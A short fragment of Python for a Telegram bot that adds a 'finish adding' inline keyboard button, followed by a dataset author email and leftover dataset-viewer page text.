keyboard.add(InlineKeyboardButton("Закончить добавление",callback_data=f"end_adding_{package_id}"))
return keyboard
|
[
"artem.karimov.98@gmail.com"
] |
artem.karimov.98@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.